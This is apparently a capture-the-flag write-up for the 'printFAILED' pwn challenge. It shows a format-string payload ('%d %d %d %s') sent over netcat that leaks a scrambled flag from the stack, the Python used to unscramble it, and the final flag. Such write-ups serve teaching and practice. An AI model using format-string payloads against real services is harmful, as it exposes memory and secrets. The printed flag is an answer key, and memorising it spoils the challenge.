printFAILED
Category: PWN
MEDIUM
I’m new to C. I just learned printf and everything just worked™. But my friend Greg, who works at a security company, tells me that some strings crashed the program but refused to tell me specifically which ones. (He wanted to publish those in DEF CON). Can you find the magic string before he carry out his evil plan?
printFailed
https://cdn.discordapp.com/attachments/840090746463191060/840091409012490241/printFailed
Connect via
nc printf.sdc.tf 1337
Solution
Quick look into Ghidra
…
Local attempt…
cat flag.txt
sdctf{example_flag}
./printFailed
can you guess the scrambled flag?
%d %d %d %s
you guessed:
-666892177 -666892246 40 tedug|fybnqmf`gmbh~
wrong
Quick check (I could have a look into decompiled scramble()
, but this way was faster as I had open python console…).
for i, j in zip('tedug|', 'sdctf{'):
print(ord(i), ord(j))
Output:
116 115
101 100
100 99
117 116
103 102
124 123
Ok, so value of each flag character is incremented by 1.
Final solution.
nc printf.sdc.tf 1337
can you guess the scrambled flag?
%d %d %d %s
you guessed:
1899030639 1899030570 40 tedug|E1ou`c4`5`g52mvs4`2jl4`uI2T`D1e4~
wrong
flag_encrypted = 'tedug|E1ou`c4`5`g52mvs4`2jl4`uI2T`D1e4~'
for i in flag_encrypted:
print(chr(ord(i)-1), end='')
Output:
sdctf{D0nt_b3_4_f41lur3_1ik3_tH1S_C0d3}
Flag
sdctf{D0nt_b3_4_f41lur3_1ik3_tH1S_C0d3}